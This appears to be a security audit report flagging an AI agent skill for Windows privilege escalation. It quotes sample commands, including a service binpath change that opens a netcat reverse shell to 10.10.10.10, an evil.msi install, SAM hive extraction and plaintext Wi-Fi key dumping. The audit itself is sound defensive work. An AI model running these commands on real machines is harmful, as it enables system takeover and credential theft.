Windows Privilege Escalation
Warn
Audited by Gen Agent Trust Hub on Mar 4, 2026
Risk Level: MEDIUM
COMMAND_EXECUTION, CREDENTIALS_UNSAFE, DATA_EXFILTRATION, REMOTE_CODE_EXECUTION, EXTERNAL_DOWNLOADS
Full Analysis
- [COMMAND_EXECUTION]: The skill provides numerous commands to manipulate system services and execute code with SYSTEM privileges. Evidence includes:
  - Modifying service binary paths to execute arbitrary shells: sc config <service> binpath= "C:\nc.exe -e cmd.exe 10.10.10.10 4444".
  - Executing malicious MSI installers via msiexec /i C:\evil.msi, which run in the context of the installer service (SYSTEM).
  - Utilizing token impersonation tools like JuicyPotato.exe, PrintSpoofer.exe, and GodPotato.exe to elevate from service accounts to SYSTEM.
- [CREDENTIALS_UNSAFE]: The skill documents extensive methods for harvesting credentials from sensitive locations:
  - Accessing the SAM and SYSTEM hives to extract user hashes: %SYSTEMROOT%\System32\config\SAM.
  - Querying the registry for plaintext passwords in Winlogon (autologin), PuTTY sessions, and VNC configurations.
  - Searching for cleartext credentials in unattend.xml, sysprep.inf, and PowerShell history files.
  - Extracting WiFi passwords using netsh wlan show profile <SSID> key=clear.
- [DATA_EXFILTRATION]: Provides instructions for copying and extracting local security databases (SAM/SYSTEM) which contain the machine's password hashes. It also details searching the entire filesystem for files containing 'pass' or 'cred' in their names.
- [REMOTE_CODE_EXECUTION]: Facilitates the establishment of reverse shells to external IP addresses (e.g., 10.10.10.10) using nc.exe and msfvenom-generated payloads.
- [EXTERNAL_DOWNLOADS]: Encourages the download and execution of multiple third-party exploitation tools (WinPEAS, Seatbelt, JuicyPotato, etc.) without specifying trusted sources or verifying integrity.
Audit Metadata